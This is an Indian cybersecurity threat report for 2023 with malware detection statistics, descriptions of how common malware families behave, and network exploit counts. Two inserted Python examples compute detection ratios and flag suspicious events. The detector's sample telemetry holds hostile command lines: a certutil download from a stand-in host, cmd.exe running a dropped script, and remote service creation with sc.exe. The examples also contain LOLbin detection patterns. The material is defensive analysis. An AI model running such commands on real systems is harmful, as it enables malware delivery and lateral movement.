  • 5. From CEO’s Desk – QUICK HEAL Therefore, it is with great pleasure that we present to you this Threat Report, a collaborative effort between SEQRITE and DSCI, drawing on the invaluable insights from SEQRITE Labs, the country’s largest Malware Analysis Lab to equip businesses with India centric knowledge and actionable recommendations to fortify their cybersecurity posture. This report stands as a testament to the diligence and dedication of our researchers and experts, whose tireless efforts have allowed us to compile a comprehensive analysis of cyber threats in the Indian landscape. The wealth of data, statistics, and telemetry from approximately nine million endpoints forms the backbone of this report, providing a unique and detailed perspective on evolving cyber threats. The report delves into the geographic and sectoral impact of cyber threats, shedding light on the top states, cities, and industries targeted throughout the year. From our analysis, it’s evident that no region or sector is immune to the reach of these malicious attacks. In addition, our commitment to ensuring holistic protection is reflected in the multiple layers of detection and protection mechanisms employed against sophisticated malwares. Notably, on the Android front, we’ve observed a significant increase in Adware and Potentially Unwanted Applications (PUAs). Shockingly, fake and malicious applications including SpyLoan and HidAdd apps hosted on Google Play Store, have been downloaded by millions of unsuspecting users. Our researchers at SEQRITE Labs have identified and got numerous such malicious apps removed from Google Play Store. Furthermore, the influence of geopolitical events, such as the Russia-Ukraine and Israel-Hamas conflicts, have cast a shadow on the global cybersecurity landscape. Despite India’s diplomatic balancing act, our government and private entities have faced cyber threats from actors supposedly affiliated with the warring parties. 
The report also uncovers cyber space violations during significant social and national events, including the G20 summit hosted by India. Central and state government websites experienced DDoS attacks, defacements, and an overall surge in attacks, aiming to tarnish the country’s image during pivotal national and global occurrences. We stand committed to simplifying cybersecurity for enterprises, government organizations and public sector entities by providing comprehensive and innovative solutions that are powered by state-of-the-art threat intelligence and play books backed by world-class service provided by the best-in-class security experts. We extend our heartfelt gratitude to DSCI for their collaborative efforts and to the dedicated team at SEQRITE Labs for their unwavering commitment to creating excellence in cybersecurity. In light of this collective endeavor to safeguard our digital landscape, I sincerely hope that this report serves as a valuable resource for our common goal of creating a safe country and a safe world. Sincerely, VISHAL SALVI Chief Executive Officer, Quick Heal Technologies Limited India’s rapidly growing digital ecosystem has proved to be a boon to its economy and is estimated to contribute over 20% to the country’s GDP by 2026. However, with digital evolution, India has also emerged as the most targeted country in terms of cyberattacks, accounting for 13.7% of all attacks worldwide. Indian government agencies witnessed 95% increase in cyberattacks in 2022, as compared to the previous year. Industries including healthcare, education, research, government, and military sectors have emerged as the most vulnerable, followed by agriculture, logistics, transportation, the energy industry at large, high-tech enterprises, pharmaceutical companies, and manufacturers of medical equipment.
  • 7. Contents

Executive Summary ... 8
Cybersecurity Outlook: Mapping the India Malware Landscape 2023 ... 13
The Anatomy of Threats ... 17
India Malware Landscape ... 33
Geographical Analysis ... 34
Sectoral Analysis ... 36
Featured Stories - 2023 ... 41
Cyber Threat Predictions for 2024 ... 67
Now to Next: Future Directions for CISOs ... 73
  • 8. Executive Summary Cybersecurity Outlook Threat Anatomy Malware Landscape Featured Stories Threat Predictions Now to Next INDIA CYBER THREAT REPORT 2023 8

Executive Summary

The DSCI-SEQRITE India Cyber Threat report is instrumental in gaining a comprehensive understanding of the current cybersecurity landscape, particularly within the Indian context. It offers valuable insights into emerging trends related to threats, the activities of threat actors, vulnerabilities and cybersecurity incidents. The report integrates strategic and technical components, making it accessible to both technical and non-technical audiences. It goes beyond the surface by identifying and elucidating the top threats, delving into the specifics of threat actors' motivations and attack techniques. Furthermore, the report provides a thorough exploration of specific sectors and geographies.
  • 9. Key Highlights

Dominant Threats
- > 400 million detections across ~8.5 million endpoints
- Averaging 761 detections per minute
- ~49 million detections stem from behaviour-based analysis, constituting 12.5% of all detections

Ransomware & Malware
- Ransomware authors continually evolve their methodologies and employ sophisticated techniques to evade traditional signature-based detection.
- Ransomware incident ratio: ~1 per 650 detections
- Malware incident ratio: ~1 per 38,000 detections

Cryptojacking
- Emerging as a significant threat with over 5 million detections in a year

Attack Vectors
- >50% of detections are associated with removable media and network drives.
- ~25% of attacks result from clicking on malicious links in emails and websites.

Mobile Threat Landscape
- An average of ~3 attacks per Android device in a month

Malware Attack Spectrum
- 41% Trojans
- 33% Infectors

Top Three Industries
- Automobile, Government, Education

Geographical Hotspots
- Telangana 15%, Tamil Nadu 14%

City-wise Analysis
- Surat 15%, Bengaluru 14%
  • 10. Observations 2023

The report presents a comprehensive analysis of malware threats based on the data collected by SEQRITE Labs, reporting 400 million malware detections across 8.5 million endpoints, averaging 761 detections every minute. The detections were examined under different subcategories, assessing the impact on various industry segments including government agencies. Additionally, the threat landscape across states and cities was explored, highlighting notable instances such as APTs in action, cryptojacking, ransomware attacks, the resurgence of old viruses, fake lending apps, and more.

2023 witnessed a pronounced increase in global threat vectors, largely influenced by significant geopolitical developments worldwide, including Russia's invasion of Ukraine. Specifically, within India, the G20 summit became a central stage for geopolitical events, garnering substantial attention regarding cyberattacks on India's digital infrastructure. During this period, there was a marked increase in both the frequency and sophistication of cyber threats, contributing to the proliferation of criminal activities such as extortion, espionage, and fraud on a broader scale.

Current anti-malware solutions face challenges with signature-based approaches, given the agility of malware creators in manipulating signatures. Behavioural analysis is a proactive approach that scrutinizes the behavioural patterns associated with potential threats, recognizing the deception tactics that contemporary malware employs against traditional signature-based detection systems. Behaviour-based detection technologies constituted over 12.5% of detections in 2023 (approximately 49 million instances).

Next-Generation Antivirus (NGAV) solutions are equipped with behaviour-based detection components to identify these advanced malware based on their traits. Behaviour-based detection observes system activities to differentiate between normal and abnormal behaviour, thereby aiding in the identification of potential threats. This approach utilizes Artificial Intelligence (AI) and Machine Learning (ML) to analyze large data sets and identify patterns that deviate from the norm, indicating potential malicious activity.

Ransomware persistently upholds its position as one of the most pernicious manifestations of cybercrime. A single ransomware security incident emerges for every 650 detections, whereas a malware incident is considerably less frequent, materializing only once in 38,000 detections.

Crypto Miners and Cryptojacking: Cryptojacking is a prevalent stratagem in which an adversary deploys malicious crypto-mining software to an unsuspecting victim's device to mine cryptocurrency coins without their permission. Crypto miners are surfacing as a tenacious menace in the cyber threat panorama. They impact all significant computing systems and can remain undetected for an extended period of time. Despite the fluctuations in cryptocurrency values throughout 2023, the large-scale deployment of crypto miners can yield substantial financial gains for threat actors. Regardless of market shifts, cryptocurrency remains paramount. Crypto mining has evolved to be more resource-demanding and consequently more expensive, so attackers have started to infiltrate multiple victims' environments to install miners and misappropriate the necessary computing resources. The year also witnessed detections associated with CryptoNight, a mining algorithm employed to secure networks and authenticate transactions in certain cryptocurrencies like Monero and Webchain. This included a surge in the usage of the Webchain miner and several XMRig-based miners. XMRig, a widely used open-source tool for mining cryptocurrencies including Bitcoin and Monero, is currently one of the coin miners most exploited by threat actors.
  • 11. Industry Trends

Automotive Industry: Over the past three to four years, the global adoption of Industry 4.0 has marked a transformative trend, with extensive integration of digitalization across industries. The automotive industry, once considered relatively secure, now faces escalating cyber threats. In 2023, a notable surge in cyber-attacks targeted the automotive sector, marking a shift from its earlier perceived safety. Supply chains within the automotive industry experienced the highest number of detections, surpassing government agencies and the education sector.

State-Backed Threats in India: India, particularly vulnerable to state-backed threat actors, witnessed an increased focus on government agencies and defense organizations.

Education Sector: The sector contends with common threats such as phishing. Account compromise, fuelled by high turnover, is a prevailing challenge. W32.Neshta.C8 emerged as a significant threat within this sector.

Power and Energy Sector: The critical power and energy sector in India, pivotal for economic growth, faces cyber threats targeting diverse verticals, including supply chain, cloud, legal, IT, and OT. The sector continues to grapple with the risk of cyber supply chain vulnerabilities, with the Expiro infector variant being particularly prevalent.

Healthcare Sector: As India advances in digitizing healthcare, securing online systems becomes imperative. Nearly 60% of healthcare organizations in India encountered cyberattacks in the past year, with the Nimda variant posing a significant threat.

Manufacturing Sector: Indian manufacturing firms confront heightened risks due to unsecured IoT devices in their networks. The implementation of 5G technology raises concerns about exacerbating existing security vulnerabilities. Ransomware attacks have disrupted manufacturing operations, especially impacting Small and Medium-sized Enterprises (SMEs), while sophisticated phishing attacks target SMEs within the sector.

Logistics, Banking, and Financial Sector: Beyond manufacturing, the logistics, banking, and financial sectors are susceptible to cyberattacks. The financial sector's digital transformation and the rise of the platform economy have elevated cyber threats on low-value transactions.

India has been a significant target for Advanced Persistent Threats (APTs). Throughout 2023, entities associated with various nations consistently conducted computer network operations, emphasizing the vital role these operations play in fulfilling national objectives. Adversaries have carried out a variety of attacks, including destructive, espionage, and information operations, characterized by a marked increase in the scope and scale of their espionage activities.

The cybersecurity landscape has been significantly influenced by the extensive integration of Android devices, constituting nearly 71% of the global market. The analysis conducted, based on 500K installations, reveals a discernible uptick in Adware and Potentially Unwanted Applications (PUAs), highlighting the persistent prominence of malware as a significant threat. The data indicates an average of 2-3 monthly attacks on Android mobiles, posing a substantial risk to corporate networks, especially considering the widespread utilization of mobile devices for office work.
  • 12. Predictions 2024

"As we move into this new era of AI-generated media, we must balance innovation with integrity and verify the source of all communication."

1. Ransomware continues to pose a significant threat to organizations, with the cost of attacks expected to rise. Key trends include increased targeting of critical infrastructure and the rise of Ransomware-as-a-Service (RaaS), which lowers entry barriers for cybercriminals. Double extortion tactics are also on the rise, where attackers both encrypt and steal victims' data. The need for robust cybersecurity measures is underscored by the evolving threat landscape and the anticipated persistence of these threats.

2. AI-powered malware like BlackMamba poses significant threats, using AI for evasion and creating unique payloads. It uses AI to capture keystrokes, potentially infiltrating Android OS. As AI evolves, phishing tactics are expected to become more personalized and effective.

3. 'Living off the land' binaries like PowerShell and Certutil pose considerable risks, being exploited to disable security measures and conduct malicious activities. The recent DarkGate malware and Cobalt Strike used these binaries to compromise systems, indicating a potential increase in such attacks in 2024.

4. Multi-Factor Authentication (MFA) fatigue attacks are a rising cybersecurity concern, where hackers inundate victims with repeated second-factor authentication requests, coercing them into granting access.

5. Looking ahead to 2024, AI-generated voice and video scams are emerging as a significant threat. These scams use advanced deep learning techniques to imitate trusted individuals, thus deceiving targets into revealing sensitive information or taking undesired actions.

6. Significant democratic events, such as elections, inevitably draw the attention of adversaries. The upcoming 2024 Indian Elections are no exception and are poised to witness a surge in cyberattacks, particularly in the form of phishing emails and malvertising. Artificial intelligence (AI) tools are increasingly being leveraged to scale up such attacks, making them more sophisticated and difficult to detect.

7. Supply chain vulnerabilities are a growing concern in cybersecurity, leading to targeted attacks with widespread consequences. The rise in such attacks calls for new regulations and global collaboration between governments and private industries. Supply chains offer attackers the opportunity for one-to-many attacks, a trend expected to escalate in 2024.

8. Zero-day vulnerabilities are increasingly being exploited by cybercriminals and state-sponsored groups for persistent access to networks. This allows them to operate undetected, extract valuable information, and demand higher ransoms. The trend is expected to grow with a focus on exploiting cloud infrastructure misconfigurations.

9. A concerning development in the cybersecurity landscape is the growing prevalence of the underground economy, where corporate assets are auctioned and breach datasets are openly traded. This surge is particularly evident in the increased auctioning of corporate access and the sale of breach datasets, driven by escalating demand for services such as penetration testing, zero-day exploits and RaaS (Ransomware as a Service) within the underground market. Consequently, there has been a notable rise in ransomware infections and instances of unauthorized access to sensitive networks, as acquired access is actively traded in underground forums.

10. Phishing attacks are increasing, often using personal data from social media to gain trust. As generative AI improves, it will be used more in scams, including mimicking voices. Dating app scams are also expected to rise.
  • 13. Cybersecurity Outlook: Mapping the India Malware Landscape 2023
  • 14. Malware Detection Overview

To arrive at the cyber threat landscape of India for the year 2023, a substantial 400 million instances of malware were observed across an extensive network of 8.5 million endpoints. Behavioural Detection (NGAV) played a pivotal role, contributing 49 million [1] of the total detections.

2023 Total Malware Detections: ~400M across 8.5 million endpoints
- Behaviour-based detections: 12.5%
- Signature-based detections: 87.5%

[1] These detection capabilities were achieved through SEQRITE's cutting-edge technologies, including Endpoint Security Server, amongst others, to provide a comprehensive approach to securing both on-premise and cloud environments.
  • 15. Scan-Wise Detections

Breakdown of scan-wise detections (share of all detections, with inference):
- Network Scans (54.5%): Monitoring and safeguarding network traffic is vital.
- Behavioural Detection (12.5%): Behaviour-based analytics are effective for malware detection.
- Real-Time Scans (RTS) (12%): RTS promptly detects and neutralizes threats, ensuring swift response and ongoing protection.
- Web Scans (10%): Web scans proactively safeguard users and data by identifying and mitigating online threats.
- On-Demand Scans (3%): On-demand malware scans give users flexible, manual threat detection for added control and security.
- Email Scans (5%): Email remains a vector of concern, with a significant number of malware instances detected through vigilant email scanning.
- Memory Scans (3%): Adversaries are actively using threats that operate in memory.
  • 16. Endpoint Architecture (diagram)

The diagram shows the Endpoint Security Server receiving rules and policies set by the Admin, and exchanging rules and alerts with EPS Clients on the Corporate Network and, via a Roaming Platform, with EPS Clients of users working from home or travelling.
  • 17. The Anatomy of Threats
  • 18. Examining Malware Subtypes 2023

The section on malware subcategories elaborates on the current landscape of digital threats, sheds light on the prevalence of various malicious entities, and their potential impact on computer systems.

Malware Subtypes 2023 (detections)*
- Trojan: 41%
- Infector: 33%
- Worm: 11%
- PUA: 7%
- Exploit: 5%
- Alarming others (Ransomware, Adware, Cryptojacking): 3%

Dissecting the 7.53 mn detections of the "Alarming Others" family
- Cryptojacking: 5.28 mn
- Adware: 1.50 mn
- Ransomware: 0.74 mn

*The reported count reflects Quick Heal installations and is based on data spanning from October 2022 to September 2023. Users are advised to consider the limited scope of this data for comprehensive insights.
  • 19.

Trojan (111.19 million): The prominence of Trojans highlights the sophistication of deceptive tactics employed by cybercriminals. Users must exercise caution when downloading and installing software to avoid falling victim to such threats. Robust endpoint security solutions are crucial to detecting and neutralizing Trojan attacks before they can compromise sensitive data.

Infector (91.40 million): Infectors pose a significant risk to the integrity of files and the overall health of computer systems. Regular system scans and the use of reputable antivirus software are essential to identify and eradicate infections promptly. Additionally, user education on safe browsing practices can help prevent inadvertent execution of infected programs.

Worm (29.62 million): The self-replicating nature of worms necessitates a proactive approach to network security. Deploying firewalls, intrusion detection systems, and network segmentation can limit the spread of worms and minimize the potential for widespread damage.

PUA (Potentially Unwanted Application) (19.48 million): Potentially Unwanted Applications may not be explicitly malicious, but their impact on system performance and user experience can be detrimental. Organizations should implement strict software controls and educate users about the risks associated with downloading and installing applications from untrusted sources.

Exploit (14.47 million): Exploits targeting software vulnerabilities demand constant vigilance in terms of software updates and patch management. Timely application of security patches is critical to close potential entry points for exploit-based attacks.

Alarming Others (7.53 million): This category, comprising Cryptojacking, Adware, and Ransomware, represents a multifaceted threat landscape.

Cryptojacking (5.28 million): The prevalence of cryptojacking emphasizes the importance of monitoring system resources and utilizing endpoint security solutions capable of detecting and blocking unauthorized cryptocurrency mining activities.

Adware (1.50 million): It can be tackled by using ad blockers and security solutions capable of identifying and eliminating adware components.

Ransomware (0.74 million): Ransomware's potentially devastating impact on organizations reinforces the need for robust backup strategies, employee training on recognizing phishing attempts, and advanced endpoint protection to inhibit ransomware attacks.
  • 20. Behaviour Based Detections

In the ever-evolving landscape of cybersecurity, the limitations of conventional detection techniques have prompted the integration of advanced methodologies to enhance the efficacy of anti-malware systems. Traditional approaches, such as signature-based methods, excel in identifying known malware patterns. However, their inherent limitation lies in their inability to effectively detect unknown or polymorphic malware strains that continuously mutate to evade signature recognition. To address these challenges, machine learning methods are being seamlessly integrated with existing detection mechanisms. While heuristic-based methods offer a promising avenue for identifying new malware variants, their susceptibility to high rates of false positives and false negatives necessitates the development of more precise and adaptive detection strategies. This imperative has led to the emergence of behaviour-based detections, which focus on analyzing the dynamic actions and patterns exhibited by potential threats, thereby offering a proactive and comprehensive defense. This synergy of machine learning and behavioural analysis marks a pivotal shift towards a more resilient and responsive approach.

Behaviour-based detections by year:
- 2021: 5 mn
- 2022: 13 mn
- 2023: 49 mn

In 2023, over 12.5% of detections (~49 million) are attributed to behaviour-based components. Over the years, behaviour-based detections have increased, indicating that these technologies will keep evolving and become more potent against the latest malware. Conventional static file-based detection methods are constrained in detecting sophisticated malware that uses custom packers and obfuscation.

NGAV solutions are equipped with behaviour-based detection components to detect sophisticated malware based on its characteristics. Listed below are some of the malware variants detected by NGAV which are otherwise difficult to detect with conventional methods.

Polymorphic Malware Variants: These malware are known for their ability to continually alter their characteristics to evade detection. Despite being derived from known malware families, their signatures are modified with each iteration, rendering them invisible to signature-based detection systems.

Code Obfuscation: This is a strategy used to dodge detection and analysis. By making the source code extremely hard to comprehend or even illegible, it can bypass tools that perform static analysis.
  • 21.

Fileless Attacks: These attacks employ macros, scripting engines, in-memory execution and "living off the land" binaries, and leave minimal or no traces on the disk.

Zero-Day Attacks: These are novel or unidentified attacks that have not yet been recorded in signature databases and represent a significant challenge for traditional antivirus solutions.

LOLbins or Living Off the Land Binaries: LOLbins are non-malicious system tools that cyber criminals can exploit to hide their malicious activities. They can execute code, perform file operations, steal passwords, and bypass detection. Often, these are Microsoft-signed binaries like Certutil and WMIC. LOLbins are challenging to detect and terminate because they use local and trusted processes. Even when detected, they can only be terminated, not quarantined, which leaves the system vulnerable to further attacks until the parent process that initiated the malicious operation is terminated. The only effective countermeasure is to detect them during malicious activity, terminate the process immediately, and quarantine the parent process or program. This can be achieved through deployment of NGAV solutions.
  • 22. Malware and Ransomware Analysis (Year 2023)

Decrypting the Menace: Unveiling the Inherent Risks of Ransomware

Ransomware: ~1 incident per 650 detections
Malware: ~1 incident per 38,000 detections

This section examines incident trends and detections from December 2022 to November 2023, focusing on the total incidents vs. total detections ratio as a key measure of detection efficiency. The prevalence of ransomware is higher due to its increased difficulty of detection in comparison to conventional malware. A lower ratio signals a more effective detection mechanism, implying a higher success rate in identifying attacks.

Monthly figures, December 2022 to November 2023 (the malware and ransomware series are told apart by the annual ratios above: 415.55 mn malware detections against 11,141 incidents, and 1,523,718 ransomware detections against 2,347 incidents):

Month    Malware detections   Malware incidents   Ransomware detections   Ransomware incidents
Dec-22   37.97 mn             708                 90,588                  163
Jan-23   33.67 mn             971                 83,985                  302
Feb-23   32.84 mn             1,103               128,287                 301
Mar-23   36.68 mn             939                 117,529                 219
Apr-23   35.32 mn             962                 113,313                 191
May-23   36.24 mn             995                 115,003                 181
Jun-23   44.93 mn             869                 316,105                 138
Jul-23   33.89 mn             971                 108,189                 148
Aug-23   30.96 mn             1,070               165,634                 185
Sep-23   33.06 mn             928                 99,463                  198
Oct-23   29.17 mn             903                 89,327                  155
Nov-23   30.82 mn             722                 96,295                  166
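The ratio the report quotes, computed from the monthly figures above, as an added example that is not the report's own code: it derives detections per incident for both series, finds the month in which ransomware detection was weakest, and flags the June volume spike. Month labels follow the December 2022 to November 2023 window stated above; the spike threshold is an assumption.

```python
from statistics import median
from typing import Dict, List

# Monthly figures transcribed from the report's chart, December 2022 to November 2023.
MONTHS = ["Dec-22", "Jan-23", "Feb-23", "Mar-23", "Apr-23", "May-23",
          "Jun-23", "Jul-23", "Aug-23", "Sep-23", "Oct-23", "Nov-23"]
MALWARE_DETECTIONS = [d * 1_000_000 for d in
                      [37.97, 33.67, 32.84, 36.68, 35.32, 36.24,
                       44.93, 33.89, 30.96, 33.06, 29.17, 30.82]]
MALWARE_INCIDENTS = [708, 971, 1103, 939, 962, 995, 869, 971, 1070, 928, 903, 722]
RANSOMWARE_DETECTIONS = [90588, 83985, 128287, 117529, 113313, 115003,
                         316105, 108189, 165634, 99463, 89327, 96295]
RANSOMWARE_INCIDENTS = [163, 302, 301, 219, 191, 181, 138, 148, 185, 198, 155, 166]


def detections_per_incident(detections: List[float], incidents: List[int]) -> float:
    """The report's headline metric: detections logged for every incident that still occurred."""
    return sum(detections) / sum(incidents)


def monthly_ratios(detections: List[float], incidents: List[int]) -> Dict[str, float]:
    """The same metric month by month, so a weak month is visible behind the annual average."""
    return {m: d / i for m, d, i in zip(MONTHS, detections, incidents)}


def weakest_month(detections: List[float], incidents: List[int]) -> str:
    """Month with the fewest detections per incident. The report reads a lower
    incidents-to-detections ratio as better, so this is the least effective month."""
    ratios = monthly_ratios(detections, incidents)
    return min(ratios, key=ratios.get)


def spike_months(series: List[float], factor: float = 2.0) -> List[str]:
    """Months whose volume exceeds `factor` times the series median: a plain SOC
    volume alarm. The factor of 2 is an assumed threshold, not the report's."""
    base = median(series)
    return [m for m, v in zip(MONTHS, series) if v > factor * base]


def summary() -> Dict[str, object]:
    return {
        "malware_detections_per_incident":
            round(detections_per_incident(MALWARE_DETECTIONS, MALWARE_INCIDENTS)),
        "ransomware_detections_per_incident":
            round(detections_per_incident(RANSOMWARE_DETECTIONS, RANSOMWARE_INCIDENTS)),
        "weakest_ransomware_month": weakest_month(RANSOMWARE_DETECTIONS, RANSOMWARE_INCIDENTS),
        "ransomware_detection_spikes": spike_months(RANSOMWARE_DETECTIONS),
    }


if __name__ == "__main__":
    for key, value in summary().items():
        print(f"{key}: {value}")
```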
  • 23.

~95 mn detections can be attributed to the following malware:

W32.Pioneer.CZ1
Detections: 50.70 mn | Threat Level: Medium | Category: File Infector | Method of Propagation: Removable or network drives
Behaviour: The malware injects its code into files present on the disk and on shared network locations. It decrypts a malicious .dll embedded in the file and drops it. This .dll performs malicious activities, collects system information and sends it to a 'CNC' server.

Worm.AUTOIT.Tupym.A
Detections: 6.21 mn | Threat Level: Medium | Category: Worm | Method of Propagation: Malicious links in instant messengers
Behaviour: The malware drops a file in the system32 folder and executes it from the dropped location. It connects to a malicious website and modifies the browser home page to another site via a registry entry. It also creates a Run entry for the same dropped file for persistence.

W32.Mofksys
Detections: 8.40 mn | Threat Level: High | Category: Worm | Method of Propagation: Removable or network drives
Behaviour: It copies itself to the following paths: <System>\explorer.exe, <Windows>\svchost.exe, <Windows>\spoolsv.exe, and adds these paths to the RunOnce registry key. It can capture activity such as keyboard/mouse inputs, including screen capturing, and pass it to the remote intruder. It drops a copy of itself on other machines in the network through writable shared drives and further uses sc.exe to remotely execute it as a service.

Trojan.Starter.YY4
Detections: 7.71 mn | Threat Level: High | Category: Trojan | Method of Propagation: Email attachments and malicious websites
Behaviour: Creates a process to run the dropped executable file. Modifies computer registry settings, which may cause a system crash. Downloads other malware such as keyloggers. Slows down booting and shutdown of the infected computer. Allows attackers to steal confidential data such as credit card details and personal information from the infected system.

Nsis.Bitmin
Detections: 3.38 mn | Threat Level: Medium | Category: Worm | Method of Propagation: Emails and malicious websites
Behaviour: It drops and replicates itself in the "%APPDATA%\temp" directory. It then extracts inner files named "uihost64.exe" and "uihost32.exe", storing them in the Temp folder. To ensure persistence, it adds a registry entry under <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run.

LNK.Cmd.Exploit.F
Detections: 7.63 mn | Threat Level: High | Category: Trojan | Method of Propagation: Email attachments and malicious websites
Behaviour: Uses cmd.exe with the "/c" command-line option to execute other malicious files. It simultaneously executes a malicious .vbs file named "help.vbs" along with a malicious .exe file. The malicious .vbs file uses the Stratum mining protocol for Monero mining.
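A detection pass over the behaviours catalogued above (look-alike system binaries registered under RunOnce, Run entries pointing into %APPDATA%, cmd.exe /c launching a .vbs, sc.exe creating a remote service) and over the LOLbin guidance earlier (terminate the process and quarantine its parent), as an added example that is neither the report's nor SEQRITE's code. The telemetry is constructed; the user-application list, field layout and rule names are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed telemetry (not from the report). "proc" = process creation:
# pid, ppid, parent image, image, command line. "reg" = registry write:
# writer pid, key, value name, data. Fields are "|"-separated.
SAMPLE_EVENTS = r"""
proc|1204|880|C:\Windows\explorer.exe|C:\Program Files\Microsoft Office\WINWORD.EXE|WINWORD.EXE invoice.docx
proc|1301|1204|C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\certutil.exe|certutil -urlcache -f http://example.invalid/u C:\Users\u\AppData\Local\Temp\u.bin
proc|1420|1204|C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\u\AppData\Roaming\temp\help.vbs
proc|1500|4|C:\Windows\System32\services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
proc|1610|1420|C:\Windows\System32\cmd.exe|C:\Windows\System32\sc.exe|sc.exe \\FILESRV01 create updsvc binPath= C:\Windows\svchost.exe
reg|1420|HKCU\Software\Microsoft\Windows\CurrentVersion\Run|uihost|C:\Users\u\AppData\Roaming\temp\uihost64.exe
reg|1500|HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce|upd|C:\Windows\svchost.exe
reg|1500|HKLM\Software\Microsoft\Windows\CurrentVersion\Run|SecurityHealth|C:\Windows\System32\SecurityHealthSystray.exe
"""

# The three LOLbins the report names; the user-facing parent applications are an assumed list.
LOLBINS = {"certutil.exe", "wmic.exe", "powershell.exe"}
USER_APPS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe"}
# Legitimate directory of the binaries W32.Mofksys imitates (lower-case, no trailing slash).
SYSTEM_BINARY_HOME = {
    "explorer.exe": r"c:\windows",
    "svchost.exe": r"c:\windows\system32",
    "spoolsv.exe": r"c:\windows\system32",
}
USER_WRITABLE = re.compile(r"\\(appdata|temp)\\", re.I)
RUN_KEY = re.compile(r"\\currentversion\\run(once)?$", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|js|ps1|bat)\b")


@dataclass
class Alert:
    rule: str
    pid: int
    image: str
    parent_pid: Optional[int]
    parent_image: Optional[str]
    action: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def dirname(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower() if "\\" in path else ""


def masquerades(path: str) -> bool:
    """True when a file borrows a core system binary's name outside that binary's real directory."""
    home = SYSTEM_BINARY_HOME.get(basename(path))
    return home is not None and dirname(path) != home


def process_rule(parent: str, image: str, cmdline: str) -> Optional[str]:
    name, cl = basename(image), cmdline.lower()
    if name in LOLBINS and basename(parent) in USER_APPS:
        return "lolbin_spawned_by_user_app"
    if name == "cmd.exe" and "/c" in cl and USER_WRITABLE.search(cl) and SCRIPT_EXT.search(cl):
        return "cmd_runs_script_from_user_writable_path"   # Nsis.Bitmin / LNK.Cmd.Exploit pattern
    if name == "sc.exe" and "\\\\" in cl and "create" in cl:
        return "remote_service_creation"                   # W32.Mofksys lateral movement
    if masquerades(image):
        return "system_binary_name_outside_home_dir"
    return None


def registry_rule(key: str, data: str) -> Optional[str]:
    if not RUN_KEY.search(key):
        return None
    if masquerades(data):
        return "run_key_points_to_masquerading_binary"      # W32.Mofksys RunOnce persistence
    if USER_WRITABLE.search(data):
        return "run_key_points_to_user_writable_path"      # Nsis.Bitmin HKCU Run persistence
    return None


def analyze(events: str) -> List[Alert]:
    procs: Dict[int, dict] = {}
    alerts: List[Alert] = []
    for line in events.strip().splitlines():
        kind, *f = line.split("|")
        if kind == "proc":
            pid, ppid, parent, image, cmdline = int(f[0]), int(f[1]), f[2], f[3], f[4]
            procs[pid] = {"image": image, "ppid": ppid, "parent": parent}
            rule = process_rule(parent, image, cmdline)
            if rule:
                # Killing only the child leaves the initiator alive: quarantine the parent as well.
                alerts.append(Alert(rule, pid, image, ppid, parent,
                                    "terminate process; quarantine parent image"))
        elif kind == "reg":
            pid, key, data = int(f[0]), f[1], f[3]
            rule = registry_rule(key, data)
            if rule:
                p = procs.get(pid, {})
                alerts.append(Alert(rule, pid, p.get("image", "?"), p.get("ppid"), p.get("parent"),
                                    "delete value; quarantine referenced file and writer process"))
    return alerts
```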
  • 24.

HTM.Nimda.A
Detections: 2.33 mn | Threat Level: Medium | Category: Worm | Method of Propagation: Spreads through emails
Behaviour: The worm spreads by sending email attachments named 'README.EXE'. It exploits CVE-2001-0154 by setting an unusual MIME header type on an HTML email containing the executable attachment. The worm infects files on victim machines and network drives.

W32.Runouce.B
Detections: 2.05 mn | Threat Level: Medium | Category: Virus | Method of Propagation: Spreads through emails
Behaviour: It sends a copy of itself as an email attachment to email IDs present in the victim's contact lists. It drops the copy in the %system% folder as 'runouce.exe' with hidden attributes and creates a mutex named 'ChineseHacker-2'.

W32.Neshta.C8
Detections: 1.53 mn | Threat Level: Medium | Category: Virus | Method of Propagation: Removable or network drives
Behaviour: Copies the virus code to the start of a clean file and keeps the clean file at the end. Drops files at the paths <Windows>\svchost.com and <Windows>\directx.sys.

A significant portion, over 50%, of the detected threats stem from removable media and network drives, highlighting potential vulnerabilities in external storage and network security. Approximately 25% of detections result from engaging with malicious links in emails and websites, highlighting the critical role of robust email and web security measures. Additionally, around 20% of the identified threats propagate through emails using file infectors. Of particular concern, 26% of these detections fall into the category of high-threat incidents, warranting immediate attention.

Top 10 files commonly found with malicious code: clean.exe, KMS-R@1n.exe, SECOH-QAD.dll, DOC001.exe, SECOH-QAD.exe, utopico.exe, SppExtComObjHook.dll, mssecsvc.exe, DriverPackNotifier.exe, Service_KMS.exe
  • 25. Top Network Based Exploits

As organizations navigate the intricacies of complex network infrastructures, identifying and comprehending the methodologies employed by cyber adversaries is crucial. This section delves into specific exploits that pose significant risks to network security.

CVE-2017-0147 highlights an information disclosure vulnerability within the Microsoft Server Message Block 1.0 (SMBv1) server. The vulnerability originates from the server's handling of particular requests, providing an avenue for attackers to create a specifically tailored packet. Exploiting this vulnerability has the potential to lead to the disclosure of information from the server. Typically, this exploitation scenario entails an unauthenticated attacker transmitting the specially crafted packet to a designated SMBv1 server.

CVE-2017-0144, known as EternalBlue, is a critical security vulnerability affecting Microsoft Windows operating systems, particularly in the Server Message Block (SMB) protocol. Exploitation of EternalBlue enables remote attackers to execute arbitrary code on a target system without user interaction. The most notable instance of this exploit was witnessed during the WannaCry ransomware attack in May 2017, where the malware rapidly spread across unpatched systems, encrypting files and demanding ransom payments. This incident underscores the significance of promptly applying security updates to mitigate known vulnerabilities.

Network Exploit Detections
- SMB/CVE-2017-0147-EC.WIN!KP.1912: 175 mn
- SMB/EternalBlue.UN!SP.31780: 155 mn
- SMB/Autoblue.UN!SP.30735: 65 mn
- HTTP/CVE-2017-9841.RCE!PT.42647: 1.3 mn
- HTTP/CVE-2021-26086.Jira!PT.44523: 0.1 mn
- HTTP/CVE-2021-44228.RCE!AW.45158: 0.4 mn

